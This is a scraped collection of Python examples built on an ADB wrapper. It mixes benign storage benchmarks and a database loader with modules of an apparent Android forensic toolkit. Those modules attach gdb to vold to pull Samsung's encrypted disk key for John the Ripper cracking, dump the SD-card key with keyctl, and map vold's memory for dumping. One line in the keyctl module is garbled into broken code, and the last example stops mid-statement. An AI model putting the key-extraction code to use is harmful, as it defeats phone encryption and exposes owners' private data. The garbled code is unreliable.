Example #1
0
 def setparams(self, params):
     self.params = params
     self.adb = ADB(self.params["adbpath"]["value"])
     self.dumpfile = self.params["dumpfile"]["value"]
     self.dekfile = self.params["dekfile"]["value"]
     self.phone = self.params["phonewithos"]["value"]
     self.out_dir = self.params["out_dir"]["value"]
Example #2
0
def read_file_by_iozone(block_size=None,
                        file_size=None,
                        threads=None,
                        sequential=None):
    """
    Read file by iozone, will use params from test_conf generally
    """
    tc_logger.info('==>Start to read file by iozone')
    device_id = test_conf["device_id"]
    exe_file = test_conf['tool']['iozone']
    exe_dir = os.path.dirname(exe_file)
    if block_size is None:
        block_size = test_conf.get('block_size', '4k').lower()
    if file_size is None:
        file_size = test_conf.get('file_size', '128m').lower()
    if threads is None:
        threads = test_conf.get('threads', '8')
    if sequential is None:
        sequential = test_conf.get('sequential', True)
    sequential = '1' if unify_bool_value(sequential) else '2'
    command = 'shell "cd {0};{1} -w -r {2} -s {3} -i {4} -I -t {5}"'.format(
        exe_dir, exe_file, block_size, file_size, sequential, str(threads))

    adb = ADB(device_id)
    adb.execute_adb_command(command)
    tc_logger.info('==>Read file by iozone over')
Example #3
0
 def __init__(self, device_id: str):
     self._device_id = device_id  #当前设备的连接id
     self._is_freeze = False  #是否处于冻结ui状态
     self._xml = None  #ui xml文件实列
     self._adb = ADB(self._device_id)  #adb 实例
     self._time_out = 10  #获取ui的超时时间
     self._sleep_spacing = 1  #单次获取ui睡眠间隔
     self._sleep_count = self._time_out / self._sleep_spacing  #获取ui睡眠次数
Example #4
0
def read_file_by_fio(block_size=None,
                     file_size=None,
                     rw=None,
                     rwmixread=None,
                     sub_jobs=None,
                     runtime=None):
    """
    Write file by fio, use params from test_conf generally
    """
    tc_logger.info('==>Write file by fio over')
    device_id = test_conf["device_id"]
    exe_file = test_conf['tool']['fio']
    iodepth = test_conf.get("iodepth", "32")

    if block_size is None:
        block_size = test_conf.get("block_size", "4k")
    if file_size is None:
        file_size = test_conf.get("file_size", "10G")
    if rw is None:
        rw = test_conf.get("rw", "read")
    if rwmixread is None:
        rwmixread = test_conf.get("rwmixread", "50")
    if runtime is None:
        runtime = test_conf.get("runtime", "600")
    if sub_jobs is None:
        sub_jobs = test_conf.get('sub_jobs', None)
    rewrite = unify_bool_value(test_conf.get('rewrite', True))
    filename = os.path.join(test_conf['tool']['dir'], 'fio_test_file')

    # testcase business workflow
    adb = ADB(device_id)
    if rw in ["randrw", "rw", "readwrite"]:
        rw = rw + " --rwmixread=" + rwmixread
    _sub_jobs = '--name=perf_std --filename={}'.format(filename)
    if sub_jobs:
        _sub_jobs_list = list()
        for i in range(1, int(sub_jobs) + 1):
            sub_name = 'job' + str(i)
            sub_filename = 'fio_test_' + str(file_size) + '_' + str(i)
            if not rewrite:
                rand_str = random.choice(range(10000))
                sub_filename = 'fio_test_' + str(file_size) + '_' + str(
                    i) + '_' + str(rand_str)
            sub_file_path = os.path.join(test_conf['tool']['dir'],
                                         sub_filename)
            _sub_job = '--name={0} --filename={1}'.format(
                sub_name, sub_file_path)
            _sub_jobs_list.append(_sub_job)
        _sub_jobs = ' '.join(_sub_jobs_list)
    fio_command = "shell {0} --direct=1 --norandommap=0 --numjobs=1 --ioengine=libaio --iodepth={1} --rw={2} --bs={3} --size={4} --runtime={5} --output-format=json,normal {6}" \
        .format(exe_file, iodepth, rw, block_size, file_size, runtime, _sub_jobs)
    adb.execute_adb_command(fio_command)
    tc_logger.info('==>Write file by fio over')
Example #5
0
    def do(self):
    	
    	prn=printer.Printer(printer.Printer.UI_CONSOLE)

    	config=ConfigParser.ConfigParser()
    	config.read("config.cfg")
    	adb=ADB(config.get("ADB","path"))


    	sands4getedk = SandS4GetEDK(prn, config, sandy.sandy.Sandy._settings['projectname'])

    	params=sands4getedk.getparams()

    	phone = getphonewithos(adb)
    	params["phonewithos"]["value"] = phone
    	config2params(config, params, phone)

    	sandy.sandyutils.print_params(params)
    	sandy.sandyutils.set_params(params)

    	sands4getedk.setparams(params)

    	su=checkforsu(adb)

    	sands4getedk.getedk()

    	return
Example #6
0
   def __init__(self, printer, config, project, adb_path="adb"):
      self.printer=printer
      self.params={"adbpath":{"description":"Path of the adb command",
			      "value":adb_path,
			      "required":True
			      },
		  "dumpfile":{"description":"Where to save the memory dumpfile with the filename",
			      "value":"dumpfile",
			      "required":True
			      },
		  "out_dir":{"description":"Where to generate the results and download files on the computer.",
			      "value":"results",
			      "required":True
			      },
		  "dekfile":{"description":"Where to generate the results and download files on the computer.",
			      "value":"dek.bin",
			      "required":True
			      },
		  "phonewithos":{"description":"The samsung hardware and the android version",
			      "value":"GT-I9300 4.1.2",
			      "required":True
			      },

		  }
      self.adb = ADB(self.params["adbpath"]["value"])
      self.out_dir=self.params["out_dir"]["value"]
      self.dumpfile = self.params["dumpfile"]["value"]
      self.dekfile = self.params["dekfile"]["value"]
      self.project=project
Example #7
0
    def do(self):
		prn=printer.Printer(printer.Printer.UI_CONSOLE)
		config=ConfigParser.ConfigParser()
		config.read("config.cfg")
		#prn.print_info(config.sections())

		adb = ADB(config.get("ADB","path"))

		sandgetfooter = SandGetFooter(prn, config, sandy.sandy.Sandy._settings['projectname'])
		
		params = sandgetfooter.getparams()

		phone = getphonewithos(adb)
		#phone="GT-I9300 4.1.2"
		params["phonewithos"]["value"] = phone
		config2params(config, params, phone)
		
		sandy.sandyutils.print_params(params)
		sandy.sandyutils.set_params(params)

		sandgetfooter.setparams(params)
		

		su=checkforsu(adb)
		sandgetfooter.getfooter()
Example #8
0
 def setparams(self, params):
    self.params=params
    self.adb = ADB(self.params["adbpath"]["value"])
    self.dumpfile = self.params["dumpfile"]["value"]
    self.dekfile = self.params["dekfile"]["value"]
    self.phone = self.params["phonewithos"]["value"]
    self.out_dir = self.params["out_dir"]["value"]
Example #9
0
def create_file_by_iozone(block_size=None, file_size=None, threads=None):
    """
    Create file by iozone, use params from test_conf generally, this method will write file 2 times
    """
    tc_logger.info('==>Start to create file by iozone')
    device_id = test_conf["device_id"]
    exe_file = test_conf['tool']['iozone']
    exe_dir = os.path.dirname(exe_file)
    if block_size is None:
        block_size = test_conf.get('block_size', '4k').lower()
    if file_size is None:
        file_size = test_conf.get('file_size', '128m').lower()
    if threads is None:
        threads = test_conf.get('threads', '8')
    command = 'shell "cd {0};{1} -w -r {2} -s {3} -i 0 -I -t {4}"'.format(
        exe_dir, exe_file, block_size, file_size, str(threads))

    adb = ADB(device_id)
    adb.execute_adb_command(command)
    tc_logger.info('==>Create file by iozone over')
Example #10
0
 def __init__(self, printer, config, project, adb_path="adb"):
     self.printer = printer
     self.params = {
         "adbpath": {
             "description": "Path of the adb command",
             "value": adb_path,
             "required": True
         },
         "dumpfile": {
             "description":
             "Where to save the memory dumpfile with the filename",
             "value": "dumpfile",
             "required": True
         },
         "out_dir": {
             "description":
             "Where to generate the results and download files on the computer.",
             "value": "results",
             "required": True
         },
         "dekfile": {
             "description":
             "Where to generate the results and download files on the computer.",
             "value": "dek.bin",
             "required": True
         },
         "phonewithos": {
             "description": "The samsung hardware and the android version",
             "value": "GT-I9300 4.1.2",
             "required": True
         },
     }
     self.adb = ADB(self.params["adbpath"]["value"])
     self.out_dir = self.params["out_dir"]["value"]
     self.dumpfile = self.params["dumpfile"]["value"]
     self.dekfile = self.params["dekfile"]["value"]
     self.project = project
Example #11
0
    def do(self):
        prn = printer.Printer(printer.Printer.UI_CONSOLE)
        config = ConfigParser.ConfigParser()
        config.read("config.cfg")

        adb = ADB(config.get("ADB", "path"))
        sandgetsdcard = SandGetSDCard(
            prn, config, sandy.sandy.Sandy._settings['projectname'])
        params = sandgetsdcard.getparams()

        sandy.sandyutils.print_params(params)
        sandy.sandyutils.set_params(params)

        sandgetsdcard.setparams(params)
        sandgetsdcard.get_sdcard_file()
        return
Example #12
0
    parser.add_argument("-f", "--file", help="JSON filename to load")
    parser.add_argument("-d", "--db", help="ArangoDB Database")
    parser.add_argument("-c", "--collection", help="ArangoDB Collection")
    parser.add_argument("-u", "--user", help="ArangoDB User")
    parser.add_argument("-p", "--password", help="ArangoDB Password")
    parser.add_argument("-k", "--key", help="Document Key in file data set")

    args = parser.parse_args()

    if not (args.key or args.collection or args.db):
        print("# Missing arguments: --key|--collection|--db")
        exit(1)

    adb = ADB(username=args.user,
              pwd=args.password,
              db=args.db,
              forceCreate=True)
    col = adb.getCollection(args.collection)
    try:
        f = open(args.file, "r")
    except Exception as e:
        print("# ERROR loading file {}: {}".format(args.file, e))

    try:
        for line in f:
            line = unicode(line, 'utf-8')
            p = json.loads(line)
            doc = col.createDocument()
            doc._key = p[args.key]
            for pk in p.keys():
                doc[pk] = p[pk]
Example #13
0
class SandS4GetEDK:


   def __init__(self, printer, config, project, adb_path="adb"):
      self.printer=printer
      self.config=config
      self.project=project
      self.params={"adbpath":{"description":"Path of the adb command",
			      "value":adb_path,
			      "required":True
			      },
		  "phonewithos":{"description":"The samsung hardware and the android version",
			      "value":"GT-I9505 4.3.2",
			      "required":True
			      },
		  "out_dir":{"description":"Where to generate the results and download files on the computer.",
			      "value":"results",
			      "required":True
			      },
		  }
      self.setparams(self.params)

   def setparams(self, params):
      self.params=params
      self.adb = ADB(self.params["adbpath"]["value"])
      self.phone = self.params["phonewithos"]["value"]
      self.out_dir = self.params["out_dir"]["value"]

   def getparams(self):
      return self.params

   def downloadforgdb(self,fullpath):
      
      """
      Downloads the fullpath for gdb. It puts the file in lib or in bin,
      Depends on the fullpath is a lib directory or not.
      """

      path, filename = os.path.split(fullpath)
      if(path.find("lib")!=-1):
         out=self.adb.get_remote_file(fullpath, "recovery/s4/system/lib/%s" % (filename))
      else:
         out=self.adb.get_remote_file(fullpath, "recovery/s4/system/bin/%s" % (filename))
      return out

   def write2john(self,edk):

      """
      Simple save the edk into the prject_sanddek.jtr file to jonh the ripper
      cracking
      """

      self.printer.print_info("This will be written to file %s/%s_sanddek.jtr, for jtr:" % (self.out_dir, self.project))
      self.printer.print_ok("%s_s4:%s" % (self.project, edk))
      try:
	 f= open("%s/%s_sanddek.jtr" % (self.out_dir, self.project), "a")
	 f.write("%s_s4:%s\n" % (self.project,  edk))
	 f.close()
      except IOError as e:
	 self.printer.print_err("I/O error({0}): {1}: {2}/{3}_sanddek.jtr".format(e.errno, e.strerror, self.out_dir, self.project))
	 return -1

   def write2footer(self,edk):

      """
      Save the EDK to a footer file. The we can use the mount modules, that
      uses the password
      """

      self.printer.print_info("Footer will be created: %s/%s_footer" % (self.out_dir, self.project))
      footer='\0'*0x84+unhexlify(edk)
      try:
	 f= open("%s/%s_footer" % (self.out_dir, self.project), "wb")
	 f.write(footer)
	 f.close()
      except IOError as e:
	 self.printer.print_err("I/O error({0}): {1}: {2}/{3}_footer".format(e.errno, e.strerror, self.out_dir, self.project))
	 return -1

   def cleanup(self, gdb=None, gdbserver=None):
      
      """
      Tries to gently stop gdb, kill gdbserver and delete it from /data/local/tmp or /tmp
      """
      
      if(gdb):
	 gdb.sendcontrol('c')
	 gdb.sendline("detach")
	 gdb.sendline("quit")
	 gdb.kill(0)
      if(gdbserver):
	 gdbserver.kill()
   
      self.adb.shell_command("rm /data/local/tmp/gdbserver")
      self.adb.shell_command("rm /tmp/gdbserver")
   

   def getedk(self):

      """
      Write the the help of the gdb and gdbserver, gets out the EDK on a S4.
      It puts a breakpoint on verify_EDK which is called when vdc cryptfs verifypw
      is called. The R0 register contains the EDK>
      """

      state=checkcryptostate(self.adb)
      if(state==""):
	 self.printer.print_err("The phone is not encrypted. ro.crypto.state is empty!")
	 return -1
      self.printer.print_debug("Check for su!")
      su=checkforsu(self.adb)
      if (su==""):
	 self.printer.print_err("The su comand was not found, hope adb have immediate root access!")
	 su=""
      
      self.printer.print_info("Downloading vold and libsec_km.so for gdb...")
      out=self.downloadforgdb("/system/bin/vold")
      if(out==None):
	 self.printer.print_err("Could not download vold! Exiting...")
	 return -1
      out=self.downloadforgdb("/system/lib/libsec_km.so")
      if(out==None):
	 self.printer.print_err("Could not download libsec_km.so! Exiting...")
	 return -1
      self.printer.print_ok("Download - Done")

      self.printer.print_debug("Check the destination directory!")
      dest_dir=""
      out=self.adb.shell_command(su+"ls /tmp")
      if (out.find("No such file or directory")!=-1):
	 self.printer.print_err("The /tmp directory was not found! We try the /data/local/tmp directory!")
	 out=self.adb.shell_command(su+"ls /data/local/tmp")
	 #if the directory empty, we will receive NoneType
	 if (out):
	    if (out.find("No such file or directory")!=-1):
	       self.printer.print_err("The /data/local/tmp directory was not found!")
	       self.printer.print_err("We did not found suitable destination directory! Please start the phone with the right recovery.")
	       return -1
	 dest_dir="/data/local/tmp"
      else:
	 dest_dir="/tmp"
      self.printer.print_debug("Use %s on the phone as a detination directory!" % dest_dir)
      
      self.printer.print_info("Uploading the gdb server...")
      push=self.adb.push_local_file("gdb/gdbserver","%s" % dest_dir)
      if(push.find("bytes")==-1):
	 self.printer.print_err("Could not upload the gdb server: %s" % push)
	 return -1
      self.printer.print_ok("Upload - Done")      

      self.print_info_adb(push.rstrip('\n'))
      self.printer.print_info("Staring gdbserver to listen on port 23946...")
      command="%s shell %s%s/gdbserver --multi :23946" % (self.adb.get_adb_path(),su,dest_dir)
      popen_args=shlex.split(command)
      self.printer.print_debug(command)
      gdbserver=subprocess.Popen(popen_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
      out=gdbserver.stdout.read(10)
      if(out.find("Listen")==-1):
	 self.printer.print_err("Could not start the gdbserver:")
	 self.printer.print_err("%s" % out.replace("\r\n","\\r\\n"))
	 self.printer.print_err("Cleaning up! You should check the %s directory on the phone!" % (dest_dir))
	 self.cleanup()
	 return -1
      
      self.printer.print_debug("Forwarding tcp socket for gdbserver...")
      out=self.adb.forward_socket("tcp:23946","tcp:23946")
      #out=self.adb.forward_socket("tcp:4446","tcp:4446")
      if(out):
	 self.printer.print_err("Could not bind on 127.0.0.1:23946! Cleaning up! You should check the %s directory on the phone!" % (dest_dir))
	 self.cleanup(gdbserver=gdbserver)
	 return -1
      
      self.printer.print_ok("Server start - Done")
      self.printer.print_info("Starting gdb...") 
      #gdb=pexpect.spawn("gdb/gdb", logfile=sys.stdout)
      gdb=pexpect.spawn("gdb/gdb")
      gdb.sendline("target extended-remote :23946")
      ret=gdb.expect(["Remote.*",".*Operation.*", ".*Ignoring.*", pexpect.TIMEOUT])
      if(ret!=0):
	 self.printer.print_err("Could not connect to gdb server! Cleaning up! You should check the %s directory on the phone!" % (dest_dir))
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      self.printer.print_ok("gdb connected - Done")
      
      gdb.sendline("file recovery/s4/system/bin/vold") 
      ret=gdb.expect(["Reading.*",".*No such.*", pexpect.TIMEOUT])
      if(ret!=0):
	 self.printer.print_err("We need the vold executable from the phone! Cleaning up! You should check the %s directory on the phone!" % (dest_dir))
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      self.printer.print_debug("We sent the file command")
      
      gdb.sendline("set solib-search-path recovery/s4/system/lib/")

      ps=self.adb.shell_command("su -c ps")
      for process in ps.splitlines():
	 if(process.rfind("vold") != -1 ):
	    process=re.sub("\s+", ' ' , process)	
	    self.voldpid=process.split(' ')[1]
      self.printer.print_ok("Found vold process id: %s!" % self.voldpid)
     
      gdb.sendline("attach %s" % (self.voldpid))
      ret=gdb.expect(["0x.*",".*to process.*", pexpect.TIMEOUT])
      if(ret!=0):
	 self.printer.print_err("Could not attach to the vold process: %s! Cleaning up! You should check the %s directory on the phone!" % (self.voldpid, dest_dir))
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      self.printer.print_ok("Attached vold process: %s!" % self.voldpid)
      
      gdb.sendline("info threads")
      gdb.expect("  4")
      thread4=gdb.readline().split(' ')[5].split('.')[1]
      #Read the rests
      for i in xrange(3):
	 gdb.readline()
      gdb.sendline("detach")
      gdb.sendline("attach %s" % (thread4))
      ret=gdb.expect(["0x.*",".*to process.*", pexpect.TIMEOUT])
      if(ret!=0):
	 self.printer.print_err("Could not attach to the vold thread: %s! Cleaning up! You should check the %s directory on the phone!" % (thread4, dest_dir))
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      self.printer.print_ok("Attached vold thread: %s!" % thread4)
      
      gdb.sendline("break verify_EDK")
      ret=gdb.expect([".*Breakpoint.*",".*pending.*"])
      if(ret!=0):
	 self.printer.print_err("Could not set breakpoint on the verify_EDK function! Cleaning up! You should check the %s directory on the phone!")
	 gdb.sendline("n")
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      self.printer.print_debug("Breakpoint was set on the verify_EDK function.")
      
      self.printer.print_debug("Staring vdc:")
      command="%s shell %s vdc cryptfs verifypw 1234" % (self.adb.get_adb_path(),su)
      popen_args=shlex.split(command)
      self.printer.print_debug(command)
      vdc=subprocess.Popen(popen_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
      out=vdc.stdout.read(15)
      if(out.find("command cryptfs")==-1):
	 self.printer.print_err("Could not start vdc: %s" % (out))
	 self.printer.print_err(" Cleaning up! You should check the %s directory on the phone!" % (dest_dir))
	 self.cleanup(gdb=gdb, gdbserver=gdbserver)
	 return -1
      
      gdb.sendline("c")
      ret=gdb.expect(".*Breakpoint.*")
      self.printer.print_debug("Breakpoint hit! Let's investigate the first parameter (r0)!")
      gdb.sendline("x /80bx $r0+32")
      gdb.expect(":")
      hex_list=[]
      for i in range(0,10):
	 if(i==0):
	    line=gdb.before+gdb.readline()
	 else:
	    line=gdb.readline()
	 hex_line=''.join(line.split("\t")[1:]).replace("0x","").rstrip("\r\n").upper()
	 hex_list.append(hex_line)
       
      self.write2john(''.join(hex_list))
      self.write2footer(''.join(hex_list))
      
      self.cleanup(gdb=gdb, gdbserver=gdbserver)
   
      return 1
   
   def print_info_adb(self,message, ok=True):
      if(ok):
	 self.printer.printer.print_debug("OK! Received the following from adb: %s" %message)
      else:
	 self.printer.print_error("ERROR! Received the following from adb: %s" %message)
Example #14
0
def tc2_wb_function_sample():
    # test data and benchmark definition according to host environment
    result = 0
    if test_conf["chip_capacity"] == "256G":
        test_data = {"fio_file_size": "25G"}
        test_benchmark = {
            "fio_sw_time": {
                "min": 20,
                "max": 60,
                "comments": ["Initial Version"]
            },
            "abs_min": {
                "min": 0,
                "max": 0,
                "comments": ["available buffer size should be used up"]
            },
            "abs_max": {
                "min":
                100,
                "max":
                100,
                "comments": [
                    "available buffer size should be able to recover to A within limited time"
                ]
            },
            "abs_recover_time": {
                "min": 0,
                "max": 600,
                "comments": ["Initial Version"]
            },
            "flush_status_after_recover_1": {
                "min": 3,
                "max": 3,
                "comments":
                ["flush status should be set to 3 after abs recovered"]
            },
            "flush_status_after_recover_2": {
                "min":
                0,
                "max":
                0,
                "comments": [
                    "flush status should be set to 0 after abs recovered and status read"
                ]
            }
        }
    elif test_conf["chip_capacity"] == "128G":
        test_data = {"fio_file_size": "13G"}
        test_benchmark = {
            "fio_sw_time": {
                "min": 10,
                "max": 30,
                "comments": ["Initial Version"]
            },
            "abs_min": {
                "min": 0,
                "max": 0,
                "comments": ["available buffer size should be used up"]
            },
            "abs_max": {
                "min":
                100,
                "max":
                100,
                "comments": [
                    "available buffer size should be able to recover to A within limited time"
                ]
            },
            "abs_recover_time": {
                "min": 0,
                "max": 600,
                "comments": ["Initial Version"]
            },
            "flush_status_after_recover_1": {
                "min": 3,
                "max": 3,
                "comments":
                ["flush status should be set to 3 after abs recovered"]
            },
            "flush_status_after_recover_2": {
                "min":
                0,
                "max":
                0,
                "comments": [
                    "flush status should be set to 0 after abs recovered and status read"
                ]
            }
        }
    else:
        raise Exception("Unsupported chip capacity: " +
                        test_conf["chip_capacity"])

    # pre_case, post_case, pre_loop and post_loop definition
    tc_logger.info(
        "Defining pre_case, post_case, pre_loop and post_loop inside of test case"
    )
    test_conf["ud_pre_case"] = ud_pre_case_string
    test_conf["ud_post_case"] = ud_post_case_string

    # pre case configuration
    set_up(level='case')

    # adb initialization
    adb = ADB(test_conf["device_id"])
    device = Device(test_conf["device_id"])

    # launch abs monitoring in backend
    def wb_func_abs_monitor(abs_use_up_timeout=60,
                            abs_recover_timeout=60,
                            monitor_interval=1,
                            log_file=None):
        if log_file is None:
            log_file = os.path.join(test_conf["monitor_home"],
                                    "wb_func_abs_monitor.log")
        # device = Device(test_conf["device_id"])
        with open(log_file, "w") as f:
            f.write("monitor_start=" + str(time.time()) + os.linesep)

            # monitor whether abs can be used up
            time_start = time.time()
            while True:
                # monitor whether ads is used up
                time_now = time.time()
                if (time_now - time_start) > abs_use_up_timeout:
                    f.write("abs_use_up_ts=timeout" + os.linesep)
                    break
                else:
                    abs_now = device.get_wb_avail_buf()[1][0]
                    f.write(abs_now + os.linesep)
                    if abs_now == "0%":
                        f.write("abs_use_up_ts=" + str(time.time()) +
                                os.linesep)
                        break
                f.flush()
                time.sleep(monitor_interval)

            # monitor whether abs can recover to 100%
            time_start = time.time()
            while True:
                # monitor whether ads is used up
                time_now = time.time()
                if (time_now - time_start) > abs_recover_timeout:
                    f.write("abs_recover_ts=timeout" + os.linesep)
                    break
                else:
                    abs_now = device.get_wb_avail_buf()[1][0]
                    f.write(abs_now + os.linesep)
                    if abs_now == "100%":
                        f.write("abs_recover_ts=" + str(time.time()) +
                                os.linesep)
                        break
                f.flush()
                time.sleep(monitor_interval)

    p = Process(target=wb_func_abs_monitor,
                args=[
                    test_benchmark["fio_sw_time"]["max"],
                    test_benchmark["abs_recover_time"]["max"],
                ])
    p.daemon = True
    p.start()

    # run fio command on cell phone background
    cmd = "shell '/data/auto_tools/fio --direct=1 --norandommap=0 --numjobs=1 --ioengine=libaio " \
          + "--iodepth=32 --rw=write --size={}  --bs=512k --runtime=600" \
          + " --name=job1 --filename=/data/auto_tools/fio_test_file'"
    cmd = cmd.format(test_data["fio_file_size"])
    fio_start_ts = time.time()
    tc_logger.info("FIO cmd execution start timestamp: " + str(fio_start_ts))
    adb.execute_adb_command(cmd)
    fio_end_ts = time.time()
    tc_logger.info("FIO cmd execution end timestamp: " + str(fio_end_ts))
    result = assert_values_meet_benchmark([fio_end_ts - fio_start_ts],
                                          test_benchmark["fio_sw_time"], False,
                                          "dc.yaml", ["fio_sw_time"]) | result

    # wait for abs monitoring to completed
    p.join(test_benchmark["fio_sw_time"]["max"] +
           test_benchmark["abs_recover_time"]["max"])
    p.terminate()

    # verify whether abs is used up during fio execution
    monitor_log_file = os.path.join(test_conf["monitor_home"],
                                    "wb_func_abs_monitor.log")
    abs_use_up_ts_pattern = re.compile("abs_use_up_ts=(.+)")
    with open(monitor_log_file, "r") as f:
        for line in f.readlines():
            abs_use_up_ts = abs_use_up_ts_pattern.search(line)
            if abs_use_up_ts is not None:
                break
            else:
                abs_min = line
    abs_min = abs_min.split("%")[0]
    result = assert_values_meet_benchmark(
        [int(abs_min)], test_benchmark["abs_min"], False, "dc.yaml",
        ["abs_min"]) | result

    # verify whether abs can fully recover
    abs_recover_ts_pattern = re.compile("abs_recover_ts=(.+)")
    with open(monitor_log_file, "r") as f:
        for line in f.readlines():
            abs_recover_ts = abs_recover_ts_pattern.search(line)
            if abs_recover_ts is not None:
                abs_recover_ts = abs_recover_ts.group(1)
                break
            else:
                abs_max = line
    abs_max = abs_max.split("%")[0]
    result = assert_values_meet_benchmark(
        [int(abs_max)], test_benchmark["abs_max"], False, "dc.yaml",
        ["abs_max"]) | result

    # verify abs recover time consumption
    if abs_recover_ts == "timeout":
        abs_recover_time = -1
    else:
        abs_recover_time = float(abs_recover_ts) - fio_end_ts
    result = assert_values_meet_benchmark(
        [abs_recover_time], test_benchmark["abs_recover_time"], False,
        "dc.yaml", ["abs_recover_time"]) | result

    # verify flush_status_after_recover_1
    flush_status_after_recover = device.get_wb_flush_status()
    result = assert_values_meet_benchmark(
        [flush_status_after_recover],
        test_benchmark["flush_status_after_recover_1"], False, "dc.yaml",
        ["flush_status_after_recover_1"]) | result

    # flush_status_after_recover_2
    flush_status_after_recover = device.get_wb_flush_status()
    result = assert_values_meet_benchmark(
        [flush_status_after_recover],
        test_benchmark["flush_status_after_recover_2"], False, "dc.yaml",
        ["flush_status_after_recover_2"]) | result

    # return test case result
    return result
Example #15
0
class SandSdcKeyctl:
    def __init__(self, printer, config, project, adb_path="adb"):
        self.printer = printer
        self.config = config
        self.project = project
        self.params = {
            "adbpath": {
                "description": "Path of the adb command",
                "value": adb_path,
                "required": True
            },
            "phonewithos": {
                "description": "The samsung hardware and the android version",
                "value": "GT-I9300 4.1.2",
                "required": True
            },
            "out_dir": {
                "description":
                "Where to generate the results and download files on the computer.",
                "value": "results",
                "required": True
            },
        }
        self.setparams(self.params)

    def setparams(self, params):
        self.params = params
        self.adb = ADB(self.params["adbpath"]["value"])
        self.phone = self.params["phonewithos"]["value"]
        self.out_dir = self.params["out_dir"]["value"]

    def getparams(self):
        return self.params

    def getsdckeybin(self):
        self.printer.print_debug("Check for su!")
        su = checkforsu(self.adb)
        if (su == ""):
            self.printer.print_err(
                "The su comand was not found, hope adb have immediate root access!"
            )
            su = ""
        #No magic here, the phone should be fully booted for this module
        dest_dir = "/data/local/tmp"
        self.printer.print_debug(
            "We will use %s on the phone as a destination directory." %
            dest_dir)
        self.printer.print_info("Uploading keyctl utility to %s..." % dest_dir)
        push = self.adb.push_local_file("keyctl/keyctl", "%s" % dest_dir)
        if (push.find("bytes") == -1):
            self.printer.print_err("Could not upload the keyctl: %s" % push)
            return -1
        self.printer.print_ok("Upload - Done")

        self.printer.print_info("Searching for the keyid...")
        self.printer.print_debug(
            "Running the following command: %s %s/keyctl show @u" %
            (su, dest_dir))
        out = self.adb.shell_command(su + "%s/keyctl show @u" % (dest_dir))
        self.printer.print_debug("The keys on the keyring:\n%s" % out)
        keyid = ""
        for line in out.splitlines():
            if (line.find("user:"******" ").split(" ")[0]

        if (keyid == ""):
            self.printer.print_err(
                "Something went wrong, could not parse 'keyctl show' output.")
            return -1
        self.printer.print_ok("The keyid is: %s." % (keyid))

        self.printer.print_info("Dumping the key...")
        self.printer.print_debug(
            "Running the following command: %s %s/keyctl pipe %s > %s/sdckey.bin"
            % (su, dest_dir, keyid, dest_dir))
        out = self.adb.shell_command(
            "\"%s %s/keyctl pipe %s > %s/sdckey.bin\"" %
            (su, dest_dir, keyid, dest_dir))
        if (out != None):
            self.printer.print_err("Something went wrong: %s" % (out))
            return -1

        self.printer.print_info("Downloading the dumped key file...")
        pull = self.adb.get_remote_file(
            "%s/sdckey.bin" % dest_dir,
            "%s/%s_sdckey.bin" % (self.out_dir, self.project))
        if (pull.find("bytes") == -1):
            self.printer.print_err("Could not download dumped key file: %s" %
                                   pull)
            self.printer.print_info(
                "Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!"
                % dest_dir)
            out = self.adb.shell_command(su + "rm %s/sdckey.bin" % dest_dir)
            out = self.adb.shell_command(su + "rm %s/keyctl" % dest_dir)
            return -1
        self.printer.print_ok("Download - Done")
        #self.printer.print_info(pull.rstrip("\n"))

        #Cleanup
        self.printer.print_info(
            "Cleaning up! Please check the %s folder. Unsuccessull cleanup weakens the security of the phone!!!!"
            % dest_dir)
        out = self.adb.shell_command(su + "rm %s/sdckey.bin" % dest_dir)
        out = self.adb.shell_command(su + "rm %s/keyctl" % dest_dir)

        return 1

    def print_info_adb(self, message, ok=True):
        if (ok):
            self.printer.printer.print_info(
                "OK! Received the following from adb: %s" % message)
        else:
            self.printer.print_error(
                "ERROR! Received the following from adb: %s" % message)
Example #16
0
class GetKey:
    def __init__(self, printer, config, project, adb_path="adb"):
        self.printer = printer
        self.params = {
            "adbpath": {
                "description": "Path of the adb command",
                "value": adb_path,
                "required": True
            },
            "dumpfile": {
                "description":
                "Where to save the memory dumpfile with the filename",
                "value": "dumpfile",
                "required": True
            },
            "out_dir": {
                "description":
                "Where to generate the results and download files on the computer.",
                "value": "results",
                "required": True
            },
            "dekfile": {
                "description":
                "Where to generate the results and download files on the computer.",
                "value": "dek.bin",
                "required": True
            },
            "phonewithos": {
                "description": "The samsung hardware and the android version",
                "value": "GT-I9300 4.1.2",
                "required": True
            },
        }
        self.adb = ADB(self.params["adbpath"]["value"])
        self.out_dir = self.params["out_dir"]["value"]
        self.dumpfile = self.params["dumpfile"]["value"]
        self.dekfile = self.params["dekfile"]["value"]
        self.project = project

    def setparams(self, params):
        self.params = params
        self.adb = ADB(self.params["adbpath"]["value"])
        self.dumpfile = self.params["dumpfile"]["value"]
        self.dekfile = self.params["dekfile"]["value"]
        self.phone = self.params["phonewithos"]["value"]
        self.out_dir = self.params["out_dir"]["value"]

    def getparams(self):
        return self.params

    def get_vold_data_segment(self):
        self.printer.print_debug("Check for su!")
        su = checkforsu(self.adb)
        if (su == ""):
            self.printer.print_err(
                "The su comand was not found, hope adb have immediate root access!"
            )
            su = ""

        #No magic here, the phone should be fully booted for this module
        self.dest_dir = "/data/local/tmp"

        ps = self.adb.shell_command("su -c ps")
        for process in ps.splitlines():
            if (process.rfind("vold") != -1):
                process = re.sub("\s+", ' ', process)
                self.voldpid = process.split(' ')[1]

        self.printer.print_debug("Found vold process id: %s!" % self.voldpid)
        memsegments = self.adb.shell_command("su -c cat /proc/%s/maps" %
                                             self.voldpid).splitlines()
        for segment in memsegments:
            if (re.match(".*w-p.*vold.*", segment) != None):
                addresses = segment.split(" ")[0].split("-")
                self.datastart = addresses[0]
                self.dataend = addresses[1]
                self.numberofbytes = int(addresses[1], 16) - int(
                    addresses[0], 16)

        self.printer.print_debug("The data segment addresses are: %s - %s" %
                                 (self.datastart, self.dataend))

        self.printer.print_info("Copy the memory dumper to %s." %
                                (self.dest_dir))

        push = self.adb.push_local_file(
